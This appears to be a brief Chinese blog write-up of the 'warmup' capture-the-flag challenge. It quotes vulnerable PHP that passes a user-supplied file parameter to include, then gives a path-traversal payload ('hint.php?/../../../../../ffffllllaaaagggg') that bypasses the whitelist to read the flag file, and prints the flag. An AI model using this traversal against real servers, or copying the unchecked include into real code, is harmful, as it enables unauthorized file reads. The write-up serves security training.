warmup
warmup
查看网页源代码发现有个source.php
下面我们注意到一个file参数
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
做过文件包含漏洞练习的小伙伴此刻就应该敏感了,这里面写了一个include函数,可以通过file来传递页面
同时上面提示了一个hint.php,进去发现这么一段话:flag not here, and flag in ffffllllaaaagggg
?file=hint.php?/../../../../../ffffllllaaaagggg
flag:flag{25e7bce6005c4e0c983fb97297ac6e5a}
作者:荒
除特别声明为原创博文外,均可转载,也欢迎转载,未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利,谢谢您的配合。